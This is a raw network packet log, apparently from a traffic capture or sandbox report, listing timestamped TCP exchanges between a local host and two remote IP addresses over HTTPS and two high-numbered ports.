Dec 12, 2024 17:39:38.246196985 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.246213913 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.247284889 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.251787901 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.251797915 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.251884937 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.251899004 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.251986980 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.403944969 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.403953075 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.404030085 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.404046059 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.404103994 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.408714056 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.408732891 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.408797026 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.408809900 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.408905029 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.414871931 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.414907932 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.414951086 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.414963007 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.414995909 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.420866013 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.420895100 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.420950890 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.420964003 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.420984983 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.421004057 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.426985025 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.427014112 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.427052021 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.427068949 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.427129984 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.427129984 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.432565928 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.432585001 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.432656050 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.432670116 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.432698965 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.432714939 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.438390017 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.438412905 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.438450098 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.438461065 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.438484907 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.438499928 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.444216967 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.444237947 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.444284916 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.444297075 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.444315910 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.444333076 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.595942020 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.595978975 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.596033096 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.596046925 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.596072912 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.596090078 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.601386070 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.601406097 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.601447105 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.601459026 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.601480961 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.601497889 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.607642889 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.607664108 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.607698917 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.607712984 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.607737064 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.607753992 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.612900019 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.612921000 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.612987995 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.613003969 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.613070965 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.618973017 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.618995905 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.619055033 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.619067907 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.619234085 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.624989986 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.625025988 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.625061035 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.625072002 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.625097036 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.625113964 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.630650043 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.630675077 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.630724907 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.630737066 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.630764008 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.630779028 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.636775970 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.636795044 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.636885881 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.636903048 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.637007952 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.788157940 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.788188934 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.788232088 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.788247108 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.788274050 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.788290977 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.793859959 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.793881893 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.793960094 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.793972015 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.794002056 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.799165010 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.799185991 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.799251080 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.799259901 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.799284935 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.799304008 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.805274010 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.805294991 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.805337906 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.805346966 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.805382967 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.811270952 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.811291933 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.811332941 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.811345100 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.811367989 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.811383009 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.816827059 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.816847086 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.816896915 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.816906929 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.816936970 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.823081017 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.823102951 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.823190928 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.823205948 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.823215008 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.823235035 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.828445911 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.828465939 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.828514099 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.828525066 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.828572035 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.980282068 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.980302095 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.980374098 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.980390072 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.980417967 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.980429888 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.985776901 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.985794067 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.985893011 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.985903025 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.989018917 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.991226912 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.991249084 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.991319895 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.991326094 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.992993116 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.997339964 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.997365952 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.997436047 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.997445107 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.997510910 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.003295898 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.003320932 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.003391981 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.003398895 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.004976034 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.008749962 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.008764982 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.008815050 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.008821964 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.008862019 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.015117884 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.015132904 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.015228033 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.015238047 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.016983032 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.020582914 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.020605087 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.020678997 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.020689011 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.024988890 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.032598019 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.172250032 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.172277927 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.172352076 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.172374964 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.172961950 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.177654028 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.177678108 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.177745104 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.177748919 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.180191040 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.183717012 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.183734894 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.183783054 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.183794975 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.183835983 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.189884901 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.189904928 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.189997911 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.190009117 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.190992117 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.195214033 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.195247889 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.195306063 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.195323944 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.195343018 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.195357084 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.201246023 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.201271057 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.201332092 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.201342106 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.204618931 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.207078934 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.207099915 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.207145929 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.207154989 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.207178116 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.207191944 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.213085890 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.213107109 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.213171005 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.213180065 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.215010881 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.364455938 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.364484072 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.364533901 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.364548922 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.364572048 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.364594936 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.369868994 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.369891882 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.369951963 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.369963884 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.370062113 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.375999928 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.376019955 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.376101017 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.376111984 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.376967907 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.381278992 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.381295919 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.381335020 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.381344080 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.381385088 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.387440920 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.387458086 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.387495041 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.387502909 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.387523890 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.387542963 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.393448114 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.393466949 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.393496990 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.393507004 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.393542051 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.399303913 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.399329901 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.399367094 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.399379015 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.399398088 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.399418116 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.405277967 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.405292034 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.405329943 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.405339003 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.405359983 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.405375957 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.557826042 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.557847023 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.557921886 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.557948112 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.558017015 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.563676119 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.563695908 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.563760042 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.563781977 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.563822985 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.569097996 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.569113016 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.569175005 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.569183111 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.569459915 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.575042963 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.575064898 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.575119972 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.575129986 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.575149059 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.575169086 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.581154108 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.581168890 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.581227064 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.581232071 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.581267118 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.586499929 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.586513996 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.586584091 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.586587906 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.586621046 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.593291044 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.593307018 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.593355894 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.593359947 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.593393087 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.598335028 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.598355055 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.598422050 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.598427057 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.598454952 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.749943972 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.749972105 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.750031948 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.750060081 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.750075102 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.750144005 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.755497932 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.755515099 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.755583048 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.755611897 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.755697966 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.757415056 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.757494926 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.757504940 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:39.757671118 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:39.757908106 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:42.351613998 CET	49796	30203	192.168.2.7	181.131.217.244
Dec 12, 2024 17:39:42.471643925 CET	30203	49796	181.131.217.244	192.168.2.7
Dec 12, 2024 17:39:42.471726894 CET	49796	30203	192.168.2.7	181.131.217.244
Dec 12, 2024 17:39:42.478749990 CET	49796	30203	192.168.2.7	181.131.217.244
Dec 12, 2024 17:39:42.598453999 CET	30203	49796	181.131.217.244	192.168.2.7
Dec 12, 2024 17:39:42.598632097 CET	49796	30203	192.168.2.7	181.131.217.244
Dec 12, 2024 17:39:42.718486071 CET	30203	49796	181.131.217.244	192.168.2.7
Dec 12, 2024 17:39:43.830913067 CET	30203	49796	181.131.217.244	192.168.2.7
Dec 12, 2024 17:39:43.831029892 CET	49796	30203	192.168.2.7	181.131.217.244
Dec 12, 2024 17:39:43.837435007 CET	49796	30203	192.168.2.7	181.131.217.244
Dec 12, 2024 17:39:43.957259893 CET	30203	49796	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:06.409022093 CET	49851	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:06.528692007 CET	1842	49851	181.131.217.244	192.168.2.7
